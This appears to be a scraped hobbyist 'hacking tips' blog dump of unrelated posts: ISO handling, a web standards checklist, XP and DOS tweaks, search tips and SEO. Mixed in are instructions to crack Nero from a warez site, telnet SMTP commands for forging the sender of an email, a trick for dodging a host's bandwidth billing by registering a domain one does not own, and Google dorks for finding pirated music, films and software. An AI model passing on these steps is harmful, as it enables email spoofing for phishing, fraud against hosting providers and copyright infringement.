So when youre reading this, u prolly have some files called *.ISO or *.CUE. Offcourse you want to install the software as fast as possible. But, theres a little problem here. Those extensions... What the hell are they... Alienized files? No. Secret CIA files? Nope. You can stop guessing. Ill tell you: those files are image files.

0x03.1 - what are images?

Image files are big files filled with data. Yea, you can say its a sort of archived file. But theres something special about them: they are meant to written on a disc. They were made by special programs so they could be used to write on a CD-R with a writer and specially designed software.

0x03.2 - ISO files.

ISO is the most used image-format on the net. It has become a standard to any commercial cd-writing software to support image-writing capabilities, more specific ISO images.
Conclusion: ISO is just an extension for a specific type of image -file. But how do you install your software? You have 2 ways of dealing with this:
1) Use the file for what is was created: writing it to a CD-R.
2) Extracting the contents of an ISO to a certain directory.

First: how to write them to a CD-R...

>>> Download some CD-R writing software (if you dont have it allready).

>>> Install and crack it.

I recommend Nero Burning Rom. You can download it from WareZone in the Apps section.

>>> Go buy some CD-R's

>>> Fire-up Nero and you can start burning. Im not going to explain you how to use Nero. Read the help file about image writing and you should be fine. You can also use the wizard which is loaded automatically when you boot Nero.

Second: what to do if you dont got a CD-writer....

>>> Download some Image handling software.

I recommend WinISO.

>>> Fire-up WinISO, load your image file and extract it. Again I wont explain how to use WinISO. Check for help files or tutorials on the net, they should give you all the answers you need.

0x03.3 - CUE & BIN files.

CUE and BIN files always come together. The BIN file is comparable with an ISO and the CUE file is just a check, but it is required for any program to write this file correctly. Sometimes, theres an SFV file included. Again this is just a check-up about the file integrity.
You can burn and extract these files the same way i explained in 0x03.2.

0x04.0 - CD Emulation.

Ok, so here's another way to handle ISO images if you don't have a cd-writer.
You can create a virtual cd drive. What's that? That's something you'll see as a new disk drive in your Windows Explorer. This disk drive represents the contents you would see if you would burn the ISO image to cd!
How to create a virtual cd drive? Download DaemonTools !
Additional help on www.daemon-tools.com

A Web Standards Checklist, How to make a proper website

2009-03-10T21:20:00.000-05:00

A web standards checklist

The term web standards can mean different things to different people. For some, it is 'table-free sites', for others it is 'using valid code'. However, web standards are much broader than that. A site built to web standards should adhere to standards (HTML, XHTML, XML, CSS, XSLT, DOM, MathML, SVG etc) and pursue best practices (valid code, accessible code, semantically correct code, user-friendly URLs etc).

In other words, a site built to web standards should ideally be lean, clean, CSS-based, accessible, usable and search engine friendly.

About the checklist

This is not an uber-checklist. There are probably many items that could be added. More importantly, it should not be seen as a list of items that must be addressed on every site that you develop. It is simply a guide that can be used:

* to show the breadth of web standards
* as a handy tool for developers during the production phase of websites
* as an aid for developers who are interested in moving towards web standards

The checklist

1.Quality of code
1. Does the site use a correct Doctype?
2. Does the site use a Character set?
3. Does the site use Valid (X)HTML?
4. Does the site use Valid CSS?
5. Does the site use any CSS hacks?
6. Does the site use unnecessary classes or ids?
7. Is the code well structured?
8. Does the site have any broken links?
9. How does the site perform in terms of speed/page size?
10. Does the site have JavaScript errors?

2. Degree of separation between content and presentation
1. Does the site use CSS for all presentation aspects (fonts, colour, padding, borders etc)?
2. Are all decorative images in the CSS, or do they appear in the (X)HTML?

3. Accessibility for users
1. Are "alt" attributes used for all descriptive images?
2. Does the site use relative units rather than absolute units for text size?
3. Do any aspects of the layout break if font size is increased?
4. Does the site use visible skip menus?
5. Does the site use accessible forms?
6. Does the site use accessible tables?
7. Is there sufficient colour brightness/contrasts?
8. Is colour alone used for critical information?
9. Is there delayed responsiveness for dropdown menus (for users with reduced motor skills)?
10. Are all links descriptive (for blind users)?

4. Accessibility for devices
1. Does the site work acceptably across modern and older browsers?
2. Is the content accessible with CSS switched off or not supported?
3. Is the content accessible with images switched off or not supported?
4. Does the site work in text browsers such as Lynx?
5. Does the site work well when printed?
6. Does the site work well in Hand Held devices?
7. Does the site include detailed metadata?
8. Does the site work well in a range of browser window sizes?

5. Basic Usability
1. Is there a clear visual hierarchy?
2. Are heading levels easy to distinguish?
3. Does the site have easy to understand navigation?
4. Does the site use consistent navigation?
5. Are links underlined?
6. Does the site use consistent and appropriate language?
7. Do you have a sitemap page and contact page? Are they easy to find?
8. For large sites, is there a search tool?
9. Is there a link to the home page on every page in the site?
10. Are visited links clearly defined with a unique colour?

6. Site management
1. Does the site have a meaningful and helpful 404 error page that works from any depth in the site?
2. Does the site use friendly URLs?
3. Do your URLs work without "www"?
4. Does the site have a favicon?

1. Quality of code

1.1 Does the site use a correct Doctype?
A doctype (short for 'document type declaration') informs the validator which version of (X)HTML you're using, and must appear at the very top of every web page. Doctypes are a key component of compliant web pages: your markup and CSS won't validate without them.
CODE
http://www.alistapart.com/articles/doctype/

More:
CODE
http://www.w3.org/QA/2002/04/valid-dtd-list.html

CODE
http://css.maxdesign.com.au/listamatic/about-boxmodel.htm

CODE
http://gutfeldt.ch/matthias/articles/doctypeswitch.html

1.2 Does the site use a Character set?
If a user agent (eg. a browser) is unable to detect the character encoding used in a Web document, the user may be presented with unreadable text. This information is particularly important for those maintaining and extending a multilingual site, but declaring the character encoding of the document is important for anyone producing XHTML/HTML or CSS.
CODE
http://www.w3.org/International/tutorials/tutorial-char-enc/

More:
CODE
http://www.w3.org/International/O-charset.html

1.3 Does the site use Valid (X)HTML?
Valid code will render faster than code with errors. Valid code will render better than invalid code. Browsers are becoming more standards compliant, and it is becoming increasingly necessary to write valid and standards compliant HTML.
CODE
http://www.maxdesign.com.au/presentation/sit2003/06.htm

More:
CODE
http://validator.w3.org/

1.4 Does the site use Valid CSS?
You need to make sure that there aren't any errors in either your HTML or your CSS, since mistakes in either place can result in botched document appearance.
CODE
http://www.meyerweb.com/eric/articles/webrev/199904.html

More:
CODE
http://jigsaw.w3.org/css-validator/

1.5 Does the site use any CSS hacks?
Basically, hacks come down to personal choice, the amount of knowledge you have of workarounds, the specific design you are trying to achieve.
CODE
http://www.mail-archive.com/wsg@webstandardsgroup.org/msg05823.html

More:
CODE
http://css-discuss.incutio.com/?page=CssHack

CODE
http://css-discuss.incutio.com/?page=ToHackOrNotToHack

CODE
http://centricle.com/ref/css/filters/

1.6 Does the site use unnecessary classes or ids?
I've noticed that developers learning new skills often end up with good CSS but poor XHTML. Specifically, the HTML code tends to be full of unnecessary divs and ids. This results in fairly meaningless HTML and bloated style sheets.
CODE
http://www.clagnut.com/blog/228/

1.7 Is the code well structured?
Semantically correct markup uses html elements for their given purpose. Well structured HTML has semantic meaning for a wide range of user agents (browsers without style sheets, text browsers, PDAs, search engines etc.)
CODE
http://www.maxdesign.com.au/presentation/benefits/index04.htm

More:
CODE
http://www.w3.org/2003/12/semantic-extractor.html

1.8 Does the site have any broken links?
Broken links can frustrate users and potentially drive customers away. Broken links can also keep search engines from properly indexing your site.

More:
CODE
http://validator.w3.org/checklink

1.9 How does the site perform in terms of speed/page size?
Don't make me wait... That's the message users give us in survey after survey. Even broadband users can suffer the slow-loading blues.
CODE
http://www.websiteoptimization.com/speed/

1.10 Does the site have JavaScript errors?
Internet Explore for Windows allows you to turn on a debugger that will pop up a new window and let you know there are javascript errors on your site. This is available under 'Internet Options' on the Advanced tab. Uncheck 'Disable script debugging'.

2. Degree of separation between content and presentation

2.1 Does the site use CSS for all presentation aspects (fonts, colour, padding, borders etc)?
Use style sheets to control layout and presentation.
CODE
http://www.w3.org/TR/WCAG10/wai-pageauth.html#tech-style-sheets

2.2 Are all decorative images in the CSS, or do they appear in the (X)HTML?
The aim for web developers is to remove all presentation from the html code, leaving it clean and semantically correct.
CODE
http://www.maxdesign.com.au/presentation/benefits/index07.htm

3. Accessibility for users

3.1 Are "alt" attributes used for all descriptive images?
Provide a text equivalent for every non-text element
CODE
http://www.w3.org/TR/WCAG10/wai-pageauth.html#tech-text-equivalent

3.2 Does the site use relative units rather than absolute units for text size?
Use relative rather than absolute units in markup language attribute values and style sheet property values'.
CODE
http://www.w3.org/TR/WCAG10/wai-pageauth.html#tech-relative-units

More:
CODE
http://www.w3.org/TR/WCAG10/wai-pageauth.html#tech-relative-units

CODE
http://www.clagnut.com/blog/348/

3.3 Do any aspects of the layout break if font size is increased?
Try this simple test. Look at your website in a browser that supports easy incrementation of font size. Now increase your browser's font size. And again. And again... Look at your site. Does the page layout still hold together? It is dangerous for developers to assume that everyone browses using default font sizes.
3.4 Does the site use visible skip menus?

A method shall be provided that permits users to skip repetitive navigation links.
CODE
http://www.section508.gov/index.cfm?FuseAction=Content&ID=12

Group related links, identify the group (for user agents), and, until user agents do so, provide a way to bypass the group.
CODE
http://www.w3.org/TR/WCAG10-TECHS/#tech-group-links

...blind visitors are not the only ones inconvenienced by too many links in a navigation area. Recall that a mobility-impaired person with poor adaptive technology might be stuck tabbing through that morass.
CODE
http://joeclark.org/book/sashay/serialization/Chapter08.html#h4-2020

More:
CODE
http://www.niehs.nih.gov/websmith/508/o.htm

3.5 Does the site use accessible forms?
Forms aren't the easiest of things to use for people with disabilities. Navigating around a page with written content is one thing, hopping between form fields and inputting information is another.
CODE
http://www.htmldog.com/guides/htmladvanced/forms/

More:
CODE
http://www.webstandards.org/learn/tutorials/accessible-forms/01-accessible-forms.html

CODE
http://www.accessify.com/tools-and-wizards/accessible-form-builder.asp

CODE
http://accessify.com/tutorials/better-accessible-forms.asp

3.6 Does the site use accessible tables?
For data tables, identify row and column headers... For data tables that have two or more logical levels of row or column headers, use markup to associate data cells and header cells.
CODE
http://www.w3.org/TR/WCAG10/wai-pageauth.html#tech-table-headers

More:
CODE
http://www.bcc.ctc.edu/webpublishing/ada/resources/tables.asp

CODE
http://www.accessify.com/tools-and-wizards/accessible-table-builder_step1.asp

CODE
http://www.webaim.org/techniques/tables/

3.7 Is there sufficient colour brightness/contrasts?
Ensure that foreground and background colour combinations provide sufficient contrast when viewed by someone having colour deficits.
CODE
http://www.w3.org/TR/WCAG10/wai-pageauth.html#tech-colour-contrast

More:
CODE
http://www.juicystudio.com/services/colourcontrast.asp

3.8 Is colour alone used for critical information?
Ensure that all information conveyed with colour is also available without colour, for example from context or markup.
CODE
http://www.w3.org/TR/WCAG10/wai-pageauth.html#tech-colour-convey

There are basically three types of colour deficiency; Deuteranope (a form of red/green colour deficit), Protanope (another form of red/green colour deficit) and Tritanope (a blue/yellow deficit- very rare).

More:
CODE
http://colourfilter.wickline.org/

CODE
http://www.toledo-bend.com/colourblind/Ishihara.html

CODE
http://www.vischeck.com/vischeck/vischeckURL.php

3.9 Is there delayed responsiveness for dropdown menus?
Users with reduced motor skills may find dropdown menus hard to use if responsiveness is set too fast.

3.10 Are all links descriptive?
Link text should be meaningful enough to make sense when read out of context - either on its own or as part of a sequence of links. Link text should also be terse.
CODE
http://www.w3.org/TR/WCAG10/wai-pageauth.html#tech-meaningful-links

4. Accessibility for devices.

4.1 Does the site work acceptably across modern and older browsers?

Before starting to build a CSS-based layout, you should decide which browsers to support and to what level you intend to support them.
CODE
http://www.maxdesign.com.au/presentation/process/index_step01.cfm

4.2 Is the content accessible with CSS switched off or not supported?
Some people may visit your site with either a browser that does not support CSS or a browser with CSS switched off. In content is structured well, this will not be an issue.

4.3 Is the content accessible with images switched off or not supported?
Some people browse websites with images switched off - especially people on very slow connections. Content should still be accessible for these people.

4.4 Does the site work in text browsers such as Lynx?
This is like a combination of images and CSS switched off. A text-based browser will rely on well structured content to provide meaning.

More:
CODE
http://www.delorie.com/web/lynxview

4.5 Does the site work well when printed?
You can take any (X)HTML document and simply style it for print, without having to touch the markup.
CODE
http://www.alistapart.com/articles/goingtoprint/

More:
CODE
http://www.d.umn.edu/itss/support/Training/Online/webdesign/css.html#print

4.6 Does the site work well in Hand Held devices?
This is a hard one to deal with until hand held devices consistently support their correct media type. However, some layouts work better in current hand-held devices. The importance of supporting hand held devices will depend on target audiences.

4.7 Does the site include detailed metadata?
Metadata is machine understandable information for the web
CODE
http://www.w3.org/Metadata/

Metadata is structured information that is created specifically to describe another resource. In other words, metadata is 'data about data'.

4.8 Does the site work well in a range of browser window sizes?
It is a common assumption amongst developers that average screen sizes are increasing. Some developers assume that the average screen size is now 1024px wide. But what about users with smaller screens and users with hand held devices? Are they part of your target audience and are they being disadvantaged?

5. Basic Usability
5.1 Is there a clear visual hierarchy?
Organise and prioritise the contents of a page by using size, prominence and content relationships.
CODE
http://www.great-web-design-tips.com/web-site-design/165.html

5.2 Are heading levels easy to distinguish?
Use header elements to convey document structure and use them according to specification.
CODE
http://www.w3.org/TR/WCAG10/wai-pageauth.html#tech-logical-headings

5.3 Is the site's navigation easy to understand?
Your navigation system should give your visitor a clue as to what page of the site they are currently on and where they can go next.
CODE
http://www.1stsitefree.com/design_nav.htm

5.4 Is the site's navigation consistent?
If each page on your site has a consistent style of presentation, visitors will find it easier to navigate between pages and find information
CODE
http://www.juicystudio.com/tutorial/accessibility/navigation.asp

5.5 Does the site use consistent and appropriate language?
The use of clear and simple language promotes effective communication. Trying to come across as articulate can be as difficult to read as poorly written grammar, especially if the language used isn't the visitor's primary language.
CODE
http://www.juicystudio.com/tutorial/accessibility/clear.asp

5.6 Does the site have a sitemap page and contact page? Are they easy to find?
Most site maps fail to convey multiple levels of the site's information architecture. In usability tests, users often overlook site maps or can't find them. Complexity is also a problem: a map should be a map, not a navigational challenge of its own.
CODE
http://www.useit.com/alertbox/20020106.html

5.7 For large sites, is there a search tool?
While search tools are not needed on smaller sites, and some people will not ever use them, site-specific search tools allow users a choice of navigation options.

5.8 Is there a link to the home page on every page in the site?
Some users like to go back to a site's home page after navigating to content within a site. The home page becomes a base camp for these users, allowing them to regroup before exploring new content.

5.9 Are links underlined?
To maximise the perceived affordance of clickability, colour and underline the link text. Users shouldn't have to guess or scrub the page to find out where they can click.
CODE
http://www.useit.com/alertbox/20040510.html

5.10 Are visited links clearly defined?
Most important, knowing which pages they've already visited frees users from unintentionally revisiting the same pages over and over again.
CODE
http://www.useit.com/alertbox/20040503.html

6. Site management

6.1 Does the site have a meaningful and helpful 404 error page that works from any depth in the site?
You've requested a page - either by typing a URL directly into the address bar or clicking on an out-of-date link and you've found yourself in the middle of cyberspace nowhere. A user-friendly website will give you a helping hand while many others will simply do nothing, relying on the browser's built-in ability to explain what the problem is.
CODE
http://www.alistapart.com/articles/perfect404/

6.2 Does the site use friendly URLs?
Most search engines (with a few exceptions - namely Google) will not index any pages that have a question mark or other character (like an ampersand or equals sign) in the URL... what good is a site if no one can find it?
CODE
http://www.sitepoint.com/article/search-engine-friendly-urls

One of the worst elements of the web from a user interface standpoint is the URL. However, if they're short, logical, and self-correcting, URLs can be acceptably usable
CODE
http://www.merges.net/theory/20010305.html

More:
CODE
http://www.sitepoint.com/article/search-engine-friendly-urls

CODE
http://www.websitegoodies.com/article/32

CODE
http://www.merges.net/theory/20010305.html

6.3 Does the site's URL work without "www"?
While this is not critical, and in some cases is not even possible, it is always good to give people the choice of both options. If a user types your domain name without the www and gets no site, this could disadvantage both the user and you.
6.4 Does the site have a favicon?

A Favicon is a multi-resolution image included on nearly all professionally developed sites. The Favicon allows the webmaster to further promote their site, and to create a more customized appearance within a visitor's browser.
CODE
http://www.favicon.com/

Favicons are definitely not critical. However, if they are not present, they can cause 404 errors in your logs (site statistics). Browsers like IE will request them from the server when a site is bookmarked. If a favicon isn't available, a 404 error may be generated. Therefore, having a favicon could cut down on favicon specific 404 errors. The same is true of a 'robots.txt' file.

Email Forge, sends email from anyone

2009-02-27T11:14:00.000-06:00

1. Some ISP's block port 25 so it might not work
2. Most likely, you won't be able to see what yer typing

First of all, you need an SMTP server. These are extremely common and, in fact, I'll provide one for you (mail.hotmail.com). SMTP: Simple Mail Transfer Protocol. This service runs on port 25 (in most cases) and is used to send outgoing email.

Now, open up the command prompt and telnet to mail.hotmail.com on port 25 (note: to see what you type, type telnet and enter then type in set local_echo):

code:--------------------------------------------------------------------------------
telnet mail.hotmail.com 25
--------------------------------------------------------------------------------

When yer connected type in (except what's in between *'s; you chose what will go in the []):

code:--------------------------------------------------------------------------------
helo
*wait*
mail from:[whoever]@[whoever.com]
*wait*
rcpt to:[whoever]@[whoever.com]
*wait*
data
*wait*
[write]
[whatever you want]
[in]
[as many]
[lines as wished]
.
*wait*
quit
--------------------------------------------------------------------------------

Helo is just a handshake with the server. Mail from: is FROM who you want the email to be. rcpt to: is who you want the email to go to. under data is what you want sent. the '.' ends data. quit quits. There! simple isn't it.

Get unlimited bandwidth from your host for free

2009-02-25T19:16:00.000-06:00

NOTE: This applies only to specific hosting companies, due to the specific setup needed and does have its drawbacks.

While setting up hosting space with a specific company I often deal with, I noticed that they used a shared IP. (IP shared by two or more websites/domains.) Well, the rates for unlimited bandwidth were around $50+ per month, which I found unreasonable. I didnt require much space, and didnt want to be limited to a mere 3 gig of traffic per month.

Back on track... When setting up the acct, the hosting company needs to know the domain name so that they can direct it accordingly. (example: 'http://www.123.4.567.890/~user1/ , 'http://www.123.4.567.890/~user2/ etc)

At this point you can give a url that doesnt belong to you at all. As long as the nameservers dont change, that should have absolutly no negative effects on you or your site whatsoever.

How it works is this:
The host propogates you a certain amount space on its servers, and monitors the traffic that enters their space through the domain its registered under. Being that the domain isn't connected to the site at all, it registers ZERO traffic.

Zero traffic registered = can't possibly go over bandwidth restrictions can't possibly go over bandwidth restrictions = free unlimited bandwidth

Now the problems with this (besides the ethical ones) is that your host may offer X amount of mail addys with the acct (you@y...) and these will not work, as the name isnt on their DNS. However, some domain companies allow you to set it up regardless. Another problem seems to be strictly cosmetic, but can be highly problematic... Once you attach the domain you want onto the site, each page comes up/w the ip/UN the host propagated to your acct. Its at this point where you have to have a phenominal 10-15 character alphanumerical or better (#, &, etc) pw, or your site will be vulnerable to attack since the attacker already has your UN. This only gives attackers a slight advantage as the amount of time it would take to brute force a 10 character pw @ a rate of 1,000,000 per second is 10 years. Add numbers and case sensitivity to that and it
becomes approx 26,980 years.

While I'm on it, I may as well add that if you use this method, obviously you are going to be using the lowest cost hosting plan available, which in turn will offer the least amount of space. Thats
why free hosts were invented.

Free hosts suck as a general rule. Who wants a site smothered in ads? However, if you upload all your programs, graphics and other large files (have a backup of course) to a reliable free host and target them accordingly from your site you have just freed up a signifigant amount of space. The only setback/w this is having to keep an index card or file around/w your pws, as you should never use the same one twice, and want to use complicated ones.

Windows XP Startup and Performance Tweaks

2009-02-23T13:32:00.000-06:00

Windows XP Startup and Performance Tweaks

Windows XP is now the predominant consumer OS of both gamers and power users. Sure, many of us still dual-boot with Win9x, because it is faster for many games, but the joy of a true 32-bit operating system with full consumer support is too much for many of us to remain loyal to NT 4.0 or Windows 2000. Now that Windows XP has matured past its infancy and many (but by far not all) of the bugs have been shaken out of it, Ars Technica brings you the first in a series of tweak guides for this illustrious and yet somewhat finicky OS.

This first guide aims to cover two main areas of contention: the boot process (sans the system services, which are an entire guide of their own) and a mishmash of general computing tweaks. The boot tweaks will be comprised of not only system settings, but also several under-utilized applications that can dramatically reduce load time. The general performance tweaks are simply various tweaks that do not quite fit in with the theme of this article, but still have a significant effect on system startup performance (because most any tweaks that one performs should have some kind of effect on the startup time of the system).

Before we begin, several pieces of laundry need to be aired out. To begin with, if you have already tweaked the services on the computer in question, please return them to the default settings. One of the applications I am recommending requires that several systems be enabled that most power users frequently disable (e.g., Task Scheduler). Once you have completed the tweaks mentioned in this guide, feel free to return said services back to your preferred settings, as they only need to be enabled for a short time.

View

http://arstechnica.com/tweak/win2k/xp/sgp-tweaks-1.html

Dos User No Boot

2009-02-18T23:05:00.000-06:00

Hello Dos friends
This is a simple but most forgotton command to create
files like config.sys and autoexec.bat files, well heres it...
Even if u dont have a dos boot disk u can work ur way
to some extent.
********************************************
At c:\ prompt
type
copy con config.sys
devicehigh=c:\dos\himem.sys
device=c:\dos\setver.exe
devicehigh=c:\dos\emm386.exe ram
dos=high,umb
last drive=z
then press CTRL + z
press enter
Config.sys file will be created.
********************************************
Similarly u can create autoexec.bat
@echo off
prompt=$P$G
path=c:\dos;c:\
lh mouse
lh doskey
Press CTRL + Z
**********************************************

Delete Undeletable File

2009-02-18T22:21:00.000-06:00

Delete An "undeletable" File

Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL where is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.

Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal

Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Google secrets

2009-02-17T15:30:00.000-06:00

method 1
?ww.google.com

put this string in google search:

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

voila!

method 2
?ww.google.com

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

Utilizing search engines

2009-02-17T15:17:00.000-06:00

So much information is on the web, its mind boggling. Thankfully we have search
engines to sift through them and catagorize them for us. Unfortunatly, there is still so
much info that even with these search engines, its often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you're looking for.

Lets get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they dont have anything useful to say. I use translation tools like the ones found at

http://babelfish.altavista.com
and

http://world.altavista.com
to translate a few key words I am searching for. Be specific and creative because these tools arent the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal/w SEO (search engine optimization) which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a sites directory will eliminate that. You can narrow your search down easily by looking for the info in specific catagories. (PS google DOES have directories, they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extention (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extention
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Lets say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other peoples PCs that they dont have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They're located on the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but thats a resolution preference, and 5X's the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

11. Search EVERYWHERE
Use the engine to its fullest. If you dont find your answer in the web section, try the group section. Hell, try a whole different search engine. Dont limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks its useful info" then I will show you WHY (besides accuracy, speed, and consistancy finding info on ANYTHING) its nice to know how a search engine works. You combine it/w your knowledge of other protocol.

Example:
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you never heard them before, they're a Brazilian heavy metal band that kicks ass. I started with this:
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.

The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

I hope you enjoyed this tutorial, and I saw that recently a book and an article was written on the very same topic. I havn't read them as of yet, but check em out, and get back to me if you feel I missed something important and should include anything else.

intitle:"index of" "google hacks" ebook

Ps. I've said it before, I'll say it again... BE CREATIVE.
You'll be surprised what you can find.

How To Get Top Ranking Search Engines

2009-02-14T22:23:00.000-06:00

The tutorial is all about getting your site listed on top in Search Engines i.e Search Engine Optimization

First thing you need to do is find the keywords you want to optimize for.

There is great tool by Overture (http://inventory.overture.com/d/sea...ory/suggestion/)

But I would suggest using this free tool called GoodKeywords (http://www.goodkeywords.com/products/gkw/)

This one does the same job as Overture does but it also supports other Search Engines (Lycos and Teoma etc..)

For example if you want to optimize for the keyword "tech news", just search for the keyword in any of the tools specified above... It would show you keywords related to that and not of the searches..

Pick the keywords which are related to your site.

For example when you search for "Tech News" you'll see the following results:

Count Search Term
11770 tech news
351 itt news tech
191 high tech news
60 news tech texas
49 computer tech news
42 bio news tech
34 in itt news tech
30 news tech virginia
29 asia news tech
25 hi tech news
25 sci tech news

Now see what other terms are related to your keyword technology news

Do couple of searches like that and note down around 15-20 keywords.
Then, keep the keywords which are searched most on the top.

Now you need Title Tag for the page.

Title tag should include top 3 keywords, like for "tech news" it can be like :

"Latest Tech News, Information Technology News and Other computer raleted news here."

Remember that characters should not be more than 95 and should not have more than 3 "," commas - some search engines might cosider more than 3 commas as spam

Now move on to Meta Tags

You need following Meta Tags in web page

No need to have other meta tags like abstract, re-visit and all, most people dont read it.

Now...

This tag is tells content type is html and character set used it iso-8859-1 there are other character sets also but this is the one mosty used..

This one should have all your keywords inside starting from keyword with most counts...

keyword tag for our example would be something like :

Remember to put around 15-20 keywords max not more than that. Dont repeat keywords or dont put keywords like, "tech news", "info tech news", "latest tech news" and so on...

Provide short decription about your site and include all the keywords mentioned in the title tag.

Decription tag should be:

It can be upto 255 characters and avoid using more than 3 "," commas

This is used for search robots..following explanation will help you :

index,follow = index the page as well as follow the links
noindex,follow = dont index the page but follow the links
index,nofollow = index the page but dont follow the links
noindex,nofollow = dont index page, dont follow the links
all = same as index,follow
none = same as noindex,nofollow

Now move on to body part of the page

Include all top 3 keywords here,
I would suggest to break the keyword and use it...

For example

YourSiteName.com one stop for all kind of Latest Tech News and Computer Related information and reviews.................

Include main keywords in tags

etc..
and start with

and then move to

etc..

tag will be too big but CSS can help you there, define small font size in css for H1,H2,... tags

When done with page copy, then you need to provide title and alt tags for images and links.

Use some keywords in the tags but dont add all the keywords and if not neccessary then dont use keywords in it, basically it should explain what is image all about.

Remember to add Top keyword atleast 4 times in the body and other 2 keywords thrice and twice respectively.

Now move on to Footer Part
Try to include top keywords here and see the effect, use site keywords as links i.e.

Tech News Software News etc..

Now finally, you need to read some more stuff..may be you can all it as bottom lines...

Site Map - This is page where you need to put all the links present in your site, this is will help Search Engines to find the links easily and also provide link for site map in footer, as search engines start scanning the page from bottom.

Robots.txt - This file contains address of directories which should not be scanned by search engines.. more info can be found here : /http://www.robotstxt.org/wc/exclusion.html search engines line google, yahoo ask for robots.txt file.

Valid HTML - Your code should have valid html and doc type, Its kind of diffucult to follow all the standards but you can atleast open and close all the tags properly, you can check your page's html online here : /http://validator.w3.org/ or you can use this free software called HTML Tidy : /http://tidy.sourceforge.net/

All done now, you just need to check your site with this script, its called SEO Doctor : /http://www.instantposition.com/seo_doctor.cfm

It'll show you the report of your site with solution.

Now, correct the errors and start submitting the site :

Start with google : /http://google.com/addurl.html
then yahoo : /http://submit.search.yahoo.com/free/request
then move to altavista,alltheweb and other search engies..

Also submit your site to direcories like /http://dmoz.org , /http://jayde.com etc...
Dmoz is must, as google, yahoo and may more search engines uses same directory

And remember, dont try to SPAM with keywords in these directories, dmoz is handled by Human Editors

Submitted the sites, but still i cant see you site on top?

Wait for sometime may be a month or so but keep an eye on your search term, use http://GoogleAlert.com - this will show whenever google updates for your keywords, it will mail you the new results.

And also check whether your site is listed on google..
use this tool called Google Monitor, it can be downloaded for free from : http://www.cleverstat.com/google-monitor.htm

How to Install and run Windows CE on your USB Stick

2009-02-14T22:21:00.000-06:00

How to: Install and run Windows CE on your USB Stick

